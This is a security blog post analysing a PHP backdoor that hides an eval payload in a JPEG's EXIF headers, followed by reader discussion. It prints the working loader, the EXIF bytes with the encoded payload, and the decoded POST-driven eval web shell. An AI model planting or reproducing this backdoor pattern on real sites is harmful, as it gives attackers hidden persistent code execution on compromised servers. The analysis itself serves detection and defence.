Malware Hidden Inside JPG EXIF Headers

A few days ago, Peter Gramantik from our research team found a very interesting backdoor on a compromised site. This backdoor didn’t rely on the normal patterns to hide its content (like base64/gzip encoding), but stored its data in the EXIF headers of a JPEG image. It also used the exif_read_data and preg_replace PHP functions to read the headers and execute itself.

Technical Details

The backdoor is divided into two parts. The first part is a mix of the exif_read_data function to read the image headers and the preg_replace function to execute the content. This is what we found in the compromised site:

$exif = exif_read_data('/homepages/clientsitepath/images/stories/food/bun.jpg');
preg_replace($exif['Make'],$exif['Model'],'');


Both functions are harmless by themselves. Exif_read_data is commonly used to read images and preg_replace to replace the content of strings. However, preg_replace has a hidden and tricky option where if you pass the “/e” modifier it will execute the content (eval), instead of just searching/replacing.

When we look at the bun.jpg file, we find the second part of the backdoor:

ÿØÿà^@^PJFIF^@^A^B^@^@d^@d^@^@ÿá^@¡Exif^@^@II*^@
^H^@^@^@^B^@^O^A^B^@^F^@^@^@&^@^@^@^P^A^B^@m^@^@^@,^@^@^@^@^@^@^@/.*/e^
@ eval ( base64_decode("aWYgKGl zc2V0KCRfUE9TVFsie noxIl0pKSB7ZXZhbChzd
HJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));
@ÿì^@^QDucky^@^A^@^D^@^@^@<^@^@ÿî^@^NAdobe^

The file starts normally with the common headers, but in the "Make" header it has a strange keyword: "/.*/e". That's the exact modifier used by preg_replace to execute (eval) whatever is passed to it.

Now things are getting interesting...

If we keep looking at the EXIF data, we can see the "eval ( base64_decode" hidden inside the "Model" header. When you put it all together, we can see what is going on. The attackers are reading both the Maker and Model header from the EXIF and filling the preg_replace with them. Once we modify the $exif['Make'] and $exif['Model'] for what is in the file, we get the final backdoor:

preg_replace ("/.*/e", ,"@ eval ( base64_decode("aWYgKGl ...");

Once decoded, we can see that it just executes whatever content is provided by the POST variable zz1. The full decoded backdoor is here:

if (isset( $_POST["zz1"])) { eval (stripslashes( $_POST["zz1"]..
Steganography Malware

Another interesting point is that bun.jpg and other images that were compromised, still load and work properly. In fact, on these compromised sites, the attackers modified a legit, pre-existent image from the site. This is a curious steganographic way to hide the malware.

Note: Any of Sucuri clients using Server Side Scanning are protected against this type of injection (detected by us).


Questions about this attack type? Leave a comment below, we'd love to hear from you!

76 comments
    1. No, it will not. It is a backdoor and only found by our server side scanner (only available to paid customers).

      1. Only? Or just anyone that search through their jpg and jpeg files (or any file for that matter but number of false positives will go up) for the strings “/.*/e” || “eval” || “base64” || “decode”.

        1. I’ve seen these kind of malicious JPG files being detected by AV software when the website is loaded. The only problem is that, by the time the AV has been able to act and delete the JPG file, the zz1 variable has already been executed and if the AV does not detect whatever this new execution does, the visitor can be owned.

          Even though the websites where these images are stored may not have a lot of visitors, the attackers probably use Blackhat SEO to make their specific images appear with a higher ranking in Google Images search.

  1. Nice find, next time I’ll blog about it 🙂 I’ve seen this backdoor hiding in JPEG’s for the last weeks, but only occasionally and on hacked Joomla sites, not WordPress (yet)

    //Edit: typo

    1. Please share what you have found. If you can send those samples to me I would love to take a look.

  2. Forgive me for my technical ignorance, but does this mean that a nefarious individual could go out and commission some pro photographs, load them with this, then release them as Creative Commons free to use – then wait 6 months until everyone is using them on their site, then activate the code?

    1. Not really, at least not easily. They would still need the first part of the backdoor to actually load that image file and execute the content. But, it won’t surprise me if someone comes with a crazy idea like that 🙂

    2. Not really. Actually all this “malware” is doing is using a JPEG to hide its executable content from investigator’s eyes. It could use a plain text file for the same purposes, except that would be more obvious.

      This is a long way from code injection purely through a JPEG file. As I read the article, the part of the site that has really been compromized is in the insertion of the preg_replace code. Without that, the EXIF data is just noise.

      1. What about having java, flash, html5 or such load the infected jpegs and by that bypass any IDS/IPS’es on the road to load something at the client side?

        1. Java, flash and html5 “shouldn’t” have any client side functions that allow execution of arbitrary untrusted code from any source. That is not to say there couldn’t be a unknown vulnerability, but again, this would be an issue with code injection, not the JPEG itself.

    1. They don’t. They just use, or better to say _misuse_ this function as it is by design.

    2. I think the answer would be that malware has added this code through some other vulnerability. (I’m doubting an open source project, like say WordPress, has an preg_replace use susceptible to this.) The information to take away from this post is that there is something else to scan your .php script for besides the typical eval(), etc, when looking for malware.

      1. Ok I think I get it. If you were to install some random script you found on the internet, someone could hide this in there and use it at some point later to inject arbitrary code.

      2. You are correct. These are injected from other exploits including access to the Amin user through brute force. Usually another shell is auto-uploaded to 404.php or index.php of the current theme and then these injections applied. They’ve also been found to have been re-uploaded through FTP.

  3. Everyone should be sanitizing variables if they’re going to be shoved willy-nilly into a preg_match call. This is really no different than SQL injection (except it’s PHP injection). I also wonder why preg_match was being used at all, since the EXIF data is not a regular expression search pattern (or at least it shouldn’t be, or you wind up with stuff like this). If it’s not regex, good ol’ str_replace is perfectly fine.

    1. The article mentioned this is a backdoor. Which means the attackers already had access to the system, which allowed them to change the bun.jpg and put the PHP code somewhere in source.

    1. To install such a backdoor, the attacker must have had some access to the server. In that case, it doesn’t matter if the website is in PHP, Ruby, Node, or any other language, they can basically do anything they want. For all we know, they got access to the server from a ssh password written on a post-it, or from a vulnerability in Apache, so again completely unrelated to PHP.

      1. Unless “bun.jpg” was perhaps a user uploadable icon or similar uploadable jpg.

        1. No, they modified existing images directly on the server: “In fact, on these compromised sites, the attackers modified a legit, pre-existent image from the site.”

        2. You can read the original Author’s response to my comment. This was not an external attack… The site was already compromised. This backdoor allows an attacker to have a backdoor into the system via a hidden web shell.

          As an attacker, this is pretty nice, since there is no connect back which would leave a crumb trail to find the attacker. Anyone with Tor or other proxies need to hit the site and issue those commands, making their access virtually unnoticeable.

          I’ve used similar tactics on my Red Team assessments.

      2. ” It also used the exif_read_data and preg_replace PHP functions to read the headers and execute itself.” First paragraph, line 3.

        1. So you mean if it had been written in something else than PHP, the attackers could not have done anything? Even with full access to the server? Well I’m not a big fan of PHP but blaming the language in this particular case makes no sense – with server access, the attackers could have done anything they wanted.

    2. It’s not PHP, its the developer who developed a weak application/system that the hacker could break into and plant a malware infected image.

    1. Lazy, lazy response, particularly given the /e flag is not relegated to PHP. It exists in Perl as well as others.

      1. It is very much related to PHP because somebody decided to implement it in PHP. The fact that a bad feature exists in something else is not an excuse to have it in your software.

        1. Nobody said it wasn’t “related” to PHP, but blaming “PHP programmers” is pretty stupid here. Again, “eval” functions exist in every interpreted language; if it’s a bad feature in PHP, it’s a bad feature everywhere.

          Put another way, this is essentially code injection in a similar fashion to SQL injection. Would you blame Python if someone didn’t properly sanitize user input? Of course not. That’s like blaming the hammer when you miss the nail by 6 inches.

          1. I would blame the programmer for not properly sanitize their inputs.

            However I think there are more sloppy PHP-programmers out there than sloppy Python or Perl-programmers.

            Either way this is a good finding and should be in everyones mind when looking for bad things in a possibly compromised server (among the other gazillion of bad things :P).

          2. In this case I suspect the programmer responsible for not properly sanitizing the input had intended just that. This is a backdoor – He’s not exploiting existing code, he was already in the system and put this backdoor in himself and used the jpeg to hide it.

            Like criticizing the thief for leaving the door broken so he could get back in the next night 😛

  4. To be honest the EXIF headers are more or less irrelevant here – the input could be from anything. The problem is using preg_replace with untrusted input, although I should probably blame both whoever wrote that code and PHP itself for making it so easy to shoot yourself in the foot.

    1. Should be clear that it’s bad to pass untrusted input into the first parameter of preg_replace. We routinely do something like preg_replace(“[^a-zA-Z0-9]”, “”, $_REQUEST[‘param’]) to clean user input.

      p.s. With great power, comes great responsibility.

        1. …or not use regexp to begin with if all you want is a simple str_replace().

          1. Which again boils down to the sloppy/lazy PHP-programmer 😉

            As you said – there is no need for preg_whatever in most situations where a simple str_replace will do the job and most likely be far more secure (and also most likely faster to perform).

          2. Oh the irony of lazy being the least laziest programmer to reply – and no offense to the rest of you, but I would be leaning towards feeding you to the wolves if you were on one of my dev teams (or at the very least, QA would be).

            Please don’t confuse “secure code” with “good code” – you’re littering your code bases with assumptions that are going to cause massive problems for someone in the future…

            I don’t expect every programmer to know absolutely everything about the programming language or system that we’re working on (that’s where TLs and QA departments come in to play), but obviously something is wrong if any code similar to what’s been posted here is actually pushed to production (without justification).

            No, you’re not allowed to corrupt data under the justification that it’s secure. Are valid input strings are always going to be alpha-numeric – and thanks to loose typing, are you even going to be passed a string to begin with?

            That might work in your head, it might even work in the limited testing that you’re doing during development (i.e. does this even work under ideal conditions) but ¿y español? 或中文?

            In the real world we deal with all kinds of data, encoded in all kinds of way. Sure, str_replace() might be a quick and dirty solution to a given problem, but if you corrupt my multibyte dataset then I hope you have something better than “it was more secure and faster to perform” to justify the mistake.

            That said, preg_quote($input) isn’t always going to be enough when dealing with PCRE functions either. There’s that pesky optional $delimiter argument that most people are too lazy to use …

            There’s a reason why we need to have development policies, code style guidelines, documentation and management – simple bugs can be very costly bugs.

          3. Well using a function which you actually doesnt need nor understand how it functions is as far as you can get from “secure coding”.

            The fact is that there are way more security holes in PHP-based webbapplications today than previously – and I strongly believe that sloopy programmers has a big part of this soup. There are other reasons aswell… however it would otherwise be hard to explain why there are so many holes in lets say WordPress (if its not a hole in WordPress itself then its a hole in one of its PHP-coded plugins).

            I mean how hard can it get to code properly? (famous last words 😉

          4. Unless I’m a nefarious hacker that has already compromised your system and I want to leave a backdoor.

            Really. Attention to detail….

            Of course he’s probably sitting there chuckling, ‘Look at these guys, they think it was the programmer, they don’t even suspect me…’

  5. The post leaves a little ambiguity on the attack. A lot of people leaving comments seem to think this is some injection attack.

    From my take, this is a backdoor. I take it the attacker already had access to the system (from some other vulnerability) and replaced the bun.jpg with the modified EXIF headers. The attacker also put the PHP code into some source where it’s executed. This allows the attacker to issue system commands remotely at any time. Even after they patch his initial entry-point.

    Daniel Cid is this accurate? Or did the attacker magically know (this might have been an open-source application) that preg_replace is used this way?

    1. Yes, 100% accurate. It is a backdoor added after the attackers got access to the site.

  6. Slightly off-topic but any suggestions on recommended resources for a beginner learning PHP. Recently one of my sites was hacked and I feel it is about time I develop a better understanding of the programming language.

  7. As stated by others there’s no reason this can’t extended to hiding code anywhere, in any type of file that is valid, like the PNG format in the “iTXt”, “tEXt”, or slightly more insidious “zTXt” chunks of a PNG file, hidden in a audio format stream etc etc.

    Interesting way to hide your payload code. I suppose if there was some file integrity checking (a la tripwire/aide) on the system in question hosting the picture it *might* have raised flags, but even a .jpg can be expected to change on a website so it might escape the cursory glance of a nightly report.

    Not being terribly PHP savvy, the hosted picture wouldn’t have to be on the same host, but hosted elsewhere and loaded through a URL call.. Even that could escape a nightly report, with some dev’s loading offsite code like jQuery..
    Probably the only real protection while using PHP would be to disable some functions, like eval or preg_*() via php.ini or use the hardened PHP Project, Suhosin, which does remove the e from preg*

    1. Also I wonder how many IDS/IPS systems out there would warn that the jpg/jpeg that just flashed by on the wire contained something odd in its EXIF area (or for that matter as you mentioned a png file containing stuff in the iTXt, tEXt or zTXt)?

      1. I think it would be hard to do, because the system would have to examine every data stream, and would likely take a decent performance hit attempting to do that (not everything is plain text code, compressed shell code, etc).
        I suppose the idea is the IPS/IDS would detect the intrusion (if properly configured) before the black hat in question has a chance to modify a system before pulling down the payload. There’s just too many ways to hide one.However there’s always a breadcrumb trail to follow if you know how and where to look.

  8. Sorry for being a complete n00b. Do you mean to say that the malware ridden image was uploaded to a site that allowed execution and hence providing a backdoor for the attacker?

  9. I don’t get it… only sites compromised, where the attacker can modify the php codes are vulnerable… so he can put whatever he wants to execute code in the source code… even a system()… this is a very localized vulnerability…

  10. Couldnt this method also be used to tunnel through “next generation firewalls”?

    That is as soon as the firewall admin allows the client to browse the internet (using http), even if various http-tunnel techniques will be blocked this one will pass since jpegs would of course be allowed to be downloaded through http (aswell as POSTed back to the server which is running the tunneling client)?

  11. very nice article I learned a lot from it include a few methods(for e.base64 vulnerable,gzip,HTTP compression etc…) I had learned a lot more than the theory himself Thanks

  12. Sanitising the inputs wouldn’t have helped since the attacker could just disable that part of the code. The main interesting thing in this attack is the use of a little-used option to make a seemingly innocuous call to preg_replace execute code. However, having a hard coded path to an image is unusual and would probably draw attention to that part of the code.

  13. In the cited fragment of EXIF header the opening ” is matched by ‘, not “.

    In the explanation later on, there are three opening brackets and one closing.

  14. Todo Se basa en un CMD en una imagen simple funcion php para defacear web solo eh visto ese viruz en un hackers llamado
    Hmei7 Este Tio defacea sitio web ect solo ace eso por diversion y poder pero me gustaria saber bien como funciona todo yah que puedo consegilo

  15. We’ve been seeing this in our IPS from users hitting various external websites. It’s just triggering on ‘base64_decode’ in the .jpg. When I decoded it, and googled, I got this post. So all our alert is indicating is a compromised webserver on the internet, not malicious activity against our internal users?

  16. Is this malware operating system dependent, or because it runs PHP code (presumably in a server environment) is it OS independent?

  17. This post really providing an exclusive information. And i appreciate your information whatever you written in your blog. Thanks for your informative post.

  18. I appreciate all the hard research concerning this form of attack to a server, but there are working examples of the code demonstrating how it works, this is still all theory. What I have found is there are a lot of posts describing this (theoretical) attack but until I can test this out on my current server to see if there is a security flaw I will conclude that this is all it is.
    I have found several image files with the EXIF modified with the PHP code, and I have also found several on the site I host with the obfuscation, but I am yet to understand how 1. They reverse the obfuscation without having a script to reverse it, and 2. How they make a call to the EXIF coding and run the script.
    This may be my issue, but each file I have discovered uploaded to my site with these modifications, I have then taken them and used a test bed server to see if I could run the code from the browser by accessing the image file directly by using the gif extension or changing it to php.
    On all my tests, I have not been able to replicate what everyone is talking about. This tells me that there has to be a high level of coding for the site that assumes many features are turned on or even installed on the Linux server.
    Again, I appreciate the post, and the theoretical debate on how this could happen, and should happen, but without detailed examples showing this is possible it is nothing more than a potential threat and nothing more.

Comments are closed.

You May Also Like